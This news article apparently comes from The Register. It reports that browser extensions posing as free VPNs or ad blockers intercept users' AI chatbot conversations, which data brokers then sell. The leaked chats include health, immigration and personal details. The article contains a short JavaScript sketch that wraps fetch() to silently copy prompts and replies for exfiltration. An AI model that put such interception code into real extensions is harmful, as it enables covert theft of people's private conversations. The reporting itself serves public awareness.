Your latest chat transcript could be bought and sold. Data brokers are selling access to sensitive personal data captured during chatbot conversations, despite claims that the data is anonymized and obtained with consent.
Lee S Dryburgh, an expert in AI visibility for consumer health and longevity brands, explained how this works in a report provided to The Register.
People install browser extensions that purport to offer free VPN service, ad blocking, or some other capability, often without reading or understanding the extension's privacy policy.

These extensions can silently intercept users' communications with AI services like ChatGPT, Gemini, Claude, and DeepSeek. They do so by overriding the browser's native fetch() and XMLHttpRequest() functions in order to capture every prompt and every response.
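The interception mechanism described above can be sketched in a few lines of JavaScript. This is a minimal illustration, not any real extension's code: the "/conversation" path check and the `sink` array are assumptions standing in for a real service's API route and an exfiltration queue.

```javascript
// Returns a drop-in replacement for fetch() that copies prompts and replies
// into `sink` whenever a request targets what looks like an AI chat endpoint.
// The "/conversation" path is a placeholder for a real service's API route.
function wrapFetch(baseFetch, sink) {
  return async function (input, init = {}) {
    const url = typeof input === "string" ? input : input.url;
    if (!url.includes("/conversation")) {
      return baseFetch(input, init); // non-chat traffic passes through untouched
    }
    sink.push({ url, prompt: init.body ?? null }); // capture the outgoing prompt
    const response = await baseFetch(input, init);
    // Clone before reading so the page still receives an unconsumed body
    sink.push({ url, reply: await response.clone().text() });
    return response;
  };
}

// A malicious content script would install it once, invisibly to the user:
// globalThis.fetch = wrapFetch(globalThis.fetch, exfiltrationQueue);
```

Because the wrapper clones the response before reading it, the page behaves exactly as before; the user sees nothing unusual while every prompt and reply is copied.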
"This data is captured from real people's private AI conversations via browser extensions, stored in a vector database, and exposed via API to authenticated customers," said Dryburgh in his report. "The panelists have pseudonymized IDs (SHA-256 hashes) but the content of their conversations is stored verbatim and searchable, and many prompts contain real names, dates of birth, medical record numbers, and diagnosis codes."
It's a technique that Dryburgh discussed with The Register in September 2025 and that Koi Security documented in December 2025 in its report titled "8 Million Users' AI Conversations Sold for Profit by 'Privacy' Extensions."

The companies that aggregate this web clickstream data insist that their data handling is lawful and the data is anonymized. That's not much of a comfort given that it has long been known that anonymized profiles can often be re-identified by connecting multiple data points, a process that AI assistance has made much easier. And, in any event, Dryburgh claims to have found many conversations that reveal names and other sensitive details.
Dryburgh said he had access to a major VC-backed generative engine optimization platform and, through that platform, was able to examine the aggregated clickstream data made available to customers.

He said he made 205 queries to the platform using the platform's own semantic search and received roughly 490 unique prompts from more than 435 unique panelists across 20 sensitive categories.
One set of queries returned conversations about depression, suicide, self-harm, medication, abuse, and eating disorders. A second provided access to chats about substance abuse, medical diagnoses, financial vulnerability, children, sexuality, and immigration. A third covered HIV/STDs, cancer, fertility/pregnancy, children, sexual violence, financial crisis, and medical diagnoses. And a fourth offered chats about medical HIPAA notes, legal PII, relationships, gender identity, criminal records, workplace harassment, and religious identity.
The most damning finding, he said in his report, is that "healthcare workers are pasting real patient data into AI chatbots, and that data is now a commercial database."

The report cites examples of these conversations, such as this one with a first name and date of birth: "Am I pregnant? [first name withheld] [birth date withheld] I know these aren't questions you'd want to answer but I am terrified…"
It also describes conversations that appear to come from undocumented immigrants and asylum seekers who have posed questions to chatbots about their legal status. Having this information available in a commercial database creates serious legal risk in the current political climate, Dryburgh argues.

The upshot, the report claims, is that customers of these data brokers can search for and find conversations about suicide, medical records that may enable identification, HIV lab results, abortion clinic searches, immigration status disclosures, domestic violence narratives, and children's conversations.
Dryburgh said he was struck by two things during his research. One is that numerous conversations involve people pasting internal corporate information into chatbots for rewrites and summaries.

The other is that a portion of these conversations appears to come from accounts that have been shared in violation of terms of service. Dryburgh explained that remote workers doing work for Western clients may rely on third-party services that sell groups of people access to a single chatbot account, because those workers cannot afford to pay for an individual subscription. The workers who pay for these cheap AI services, he speculates, are likely to use the kinds of free VPNs that capture clickstream data. ®















